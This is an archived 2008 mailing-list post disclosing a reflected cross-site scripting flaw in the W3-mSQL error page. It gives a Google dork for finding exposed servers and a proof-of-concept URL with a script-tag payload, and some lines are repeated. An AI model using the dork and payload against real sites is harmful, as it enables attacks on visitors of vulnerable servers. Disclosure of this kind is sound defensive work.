|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
xss in w3-msql error page
vivek_infosec
yahoo.com
Date: Thu Jan 03 2008 - 08:11:28 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
A reflected xss flaw exists in the w3-msql error page.
google dork : "W3-mSQL Error! - Can't stat script file (/"
Just insert a script from the start of /
like if u get a URL like:-
http://localhost/cgi-bin/w3-msql/journal/ijcd/index.html
and the error page output as :-
W3-mSQL Error! - Can't stat script file (/journal/ijcd/index.html)
u can try this:-
A reflected xss flaw exists in the w3-msql error page.
google dork : "W3-mSQL Error! - Can't stat script file (/"
Just insert a script from the start of /
like if u get a URL like:-
http://localhost/cgi-bin/w3-msql/<script>alert('xss')</script>
to confirm the issue
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]